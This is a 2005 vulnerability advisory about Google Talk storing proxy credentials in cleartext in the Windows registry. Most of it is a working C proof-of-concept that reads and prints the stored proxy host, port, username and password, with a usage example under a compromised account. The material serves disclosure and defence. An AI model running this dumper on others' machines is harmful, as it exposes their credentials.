Title: Google Talk cleartext proxy credentials vulnerability
Risk: Low/Medium
Versions affected: <= 1.0.0.72
Credits: pagvac (Adrian Pastor)
Date found: 12th Oct, 2005
Homepage: www.ikwt.com (In Knowledge We Trust) www.adrianpv.com
E-mail: m123303 [ - a t - ] richmond.ac.uk

[Background]
Google Talk is a messenger client for Windows based on Jabber and can be downloaded from http://www.google.com/talk/

[Vulnerability Description]
Google Talk seems to do a good job of storing the gmail login credentials in the Registry. These are the credentials needed to establish a connection to talk.google.com and are located under HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts\[username]@gmail.com\pw In this case the password seems to be encrypted (or at least obfuscated). It should also be noted that Google Talk stores the user settings under the correct hive (HKEY_CURRENT_USER rather than HKEY_LOCAL_MACHINE). That way only the currently logged-in user will have access to his/her Google Talk settings. *However*, the developers behind Google Talk seem to have forgotten to use any mechanism of encryption/obfuscation when it comes to saving the credentials for the proxy connection. In this case, all user credentials (username and password) are stored as *cleartext* (human readable) in the Windows Registry. Such credentials are located under HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_user HKEY_CURRENT_USER\Software\Google\Google Talk\Options\auth_pass

[Feasibility of exploitation]
In order to exploit this vulnerability, 3 requirements must be met:
1. The victim connects through a proxy when using Google Talk
2. That proxy requires login credentials (username/password)
3. The attacker has compromised the account of the victim user (see PoC section for an example)

[Solution]
Do not use Google Talk behind a proxy which requires authentication, or wait until the vendor releases a patched version.
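[PoC]
#include <windows.h>
#include <stdio.h>
#include <string.h>

#define TITLE "\nGoogle Talk cleartext proxy credentials PoC exploit\n"

/*
 Author:   pagvac (Adrian Pastor)
 Date found: 12th Oct, 2005
 Filename: google-talk-dump-proxy-credentials.c

 Example of usage:

 C:\>runas /user:compromised-account cmd.exe
 Enter the password for compromised-account: [password entered]
 Attempting to start cmd.exe as user "target-host\compromised-account" ...

 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\WINDOWS\system32>e:
 E:\>cd "my exploits"
 E:\my exploits>google-talk-dump-proxy-credentials.exe

 Proxy credentials cleartext storage vulnerability - PoC exploit
 By pagvac (Adrian Pastor)
 www.ikwt.com (In Knowledge We Trust)

 Proxy host:     192.168.1.10
 Port number:    8080
 Username:       compromised_username
 Password:       compromised_password

 Review notes on this version of the PoC:
  - RegCloseKey() is no longer called with an uninitialized HKEY when
    RegOpenKeyEx() fails (the original closed a garbage handle on every
    failure path).
  - REG_SZ data read back from the registry is not guaranteed to be
    NUL-terminated, so the read is bounded one byte short and terminated
    explicitly before it is copied into the caller's buffer.
  - The value type reported by RegQueryValueEx() is checked, so a value of
    an unexpected type is reported as "not found" instead of being printed
    as a string or copied as a DWORD.
  - DWORD is printed with a matching format specifier ("%lu" after an
    explicit cast) instead of "%d".
 The program only reads the HKEY_CURRENT_USER hive, i.e. the settings of
 the account it is running as; it needs no elevated privileges.
*/

/* Per-user key that Google Talk creates when it is installed. */
#define GTALK_KEY      "Software\\Google\\Google Talk"
/* Sub-key that holds the proxy settings (proxy_host, proxy_port, auth_user, auth_pass). */
#define GTALK_OPTIONS  "Software\\Google\\Google Talk\\Options"

enum {
    VAL_BUF_SIZE = 255,      /* size of the caller-supplied string buffers */
    DEFAULT_PROXY_PORT = 1080 /* printed when no proxy_port value is stored */
};

/*
 * Returns TRUE when the Google Talk key exists in the current user's hive.
 * Nothing outside HKEY_CURRENT_USER is examined.
 */
BOOL googleTalkIsInstalled(void)
{
    HKEY hKey = NULL;
    LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, GTALK_KEY, 0L, KEY_READ, &hKey);
    if (rc != ERROR_SUCCESS) {
        /* hKey is not a valid handle when the open failed; do not close it. */
        return FALSE;
    }
    RegCloseKey(hKey);
    return TRUE;
}

/*
 * Reads the string value lszVal2Query from the Google Talk Options key into
 * lszValData, a caller-supplied buffer of VAL_BUF_SIZE bytes.
 *
 * Returns TRUE and a NUL-terminated string in lszValData on success.
 * Returns FALSE when the key or value does not exist, the value is not of a
 * string type (REG_SZ / REG_EXPAND_SZ), or the data does not fit in the
 * buffer; lszValData is left unchanged in that case.
 */
BOOL QueryStrVal(const char lszVal2Query[VAL_BUF_SIZE], char lszValData[VAL_BUF_SIZE])
{
    HKEY hKey = NULL;
    LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, GTALK_OPTIONS, 0L, KEY_READ, &hKey);
    if (rc != ERROR_SUCCESS) {
        return FALSE;
    }

    /* Read at most sizeof lszResult - 1 bytes so there is always room to
     * append a terminator: registry string data may lack its trailing NUL. */
    char lszResult[VAL_BUF_SIZE];
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof lszResult - 1;
    rc = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)lszResult, &dwSize);
    RegCloseKey(hKey);

    /* dwType is an output parameter; a non-string value (e.g. a DWORD) must
     * not be copied as text. ERROR_MORE_DATA (value too large) also lands here. */
    if (rc != ERROR_SUCCESS || (dwType != REG_SZ && dwType != REG_EXPAND_SZ)) {
        return FALSE;
    }

    lszResult[dwSize] = '\0';   /* dwSize <= VAL_BUF_SIZE - 1, so this index is in bounds */
    snprintf(lszValData, VAL_BUF_SIZE, "%s", lszResult);
    return TRUE;
}

/*
 * Reads the REG_DWORD value lszVal2Query from the Google Talk Options key.
 *
 * Returns TRUE and stores the value in *dwVal on success.
 * Returns FALSE when dwVal is NULL, the key or value does not exist, or the
 * value is not a 4-byte REG_DWORD; *dwVal is left unchanged in that case.
 */
BOOL QueryDwordVal(const char lszVal2Query[VAL_BUF_SIZE], DWORD *dwVal)
{
    if (dwVal == NULL) {
        return FALSE;
    }

    HKEY hKey = NULL;
    LONG rc = RegOpenKeyEx(HKEY_CURRENT_USER, GTALK_OPTIONS, 0L, KEY_READ, &hKey);
    if (rc != ERROR_SUCCESS) {
        return FALSE;
    }

    DWORD dwResult = 0;
    DWORD dwType = REG_NONE;
    DWORD dwSize = sizeof dwResult;
    rc = RegQueryValueEx(hKey, lszVal2Query, NULL, &dwType, (LPBYTE)&dwResult, &dwSize);
    RegCloseKey(hKey);

    /* Reject anything that is not exactly a REG_DWORD of the expected size. */
    if (rc != ERROR_SUCCESS || dwType != REG_DWORD || dwSize != sizeof dwResult) {
        return FALSE;
    }

    *dwVal = dwResult;
    return TRUE;
}

/*
 * Prints "<label>:\t<value>" for the string setting valueName, or absentMsg
 * when the value is missing or empty. An empty string is treated the same as
 * a missing value, matching the original PoC's two-step check.
 */
static void printStrSetting(const char *valueName, const char *label, const char *absentMsg)
{
    char lszData[VAL_BUF_SIZE];
    if (!QueryStrVal(valueName, lszData) || lszData[0] == '\0') {
        fputs(absentMsg, stdout);
        return;
    }
    printf("%s:\t%s\n", label, lszData);
}

/*
 * Entry point: reports whether Google Talk is installed for the current user
 * and, if a proxy is configured, prints the stored proxy settings.
 * Always returns 0.
 */
int main(void)
{
    fputs(TITLE, stdout);   /* TITLE holds no conversion specifiers; print it verbatim */
    printf("By pagvac (Adrian Pastor)\n");
    printf("www.ikwt.com (In Knowledge We Trust)\n\n");

    // Google Talk is *not* installed
    if (!googleTalkIsInstalled()) {
        printf("Google Talk does *not* seem to be installed for the current user\n");
        return 0;
    }

    // No proxy settings are present
    char lszData[VAL_BUF_SIZE];
    if (!QueryStrVal("proxy_host", lszData)) {
        printf("No proxy settings were found!\n");
        printf("Probably Google Talk is connecting *directly* to the Internet...\n");
        return 0;
    }

    // Proxy settings were configured
    printf("Proxy host:\t%s\n", lszData);

    // Print port number
    DWORD dwData = 0;
    if (QueryDwordVal("proxy_port", &dwData)) {
        printf("Port number:\t%lu\n", (unsigned long)dwData);
    } else {
        printf("Port number:\t%d\n", DEFAULT_PROXY_PORT); // by default port 1080 is used for proxy
    }

    // Print username and password
    printStrSetting("auth_user", "Username", "(no username required)\n");
    printStrSetting("auth_pass", "Password", "(no password required)\n");

    return 0;
}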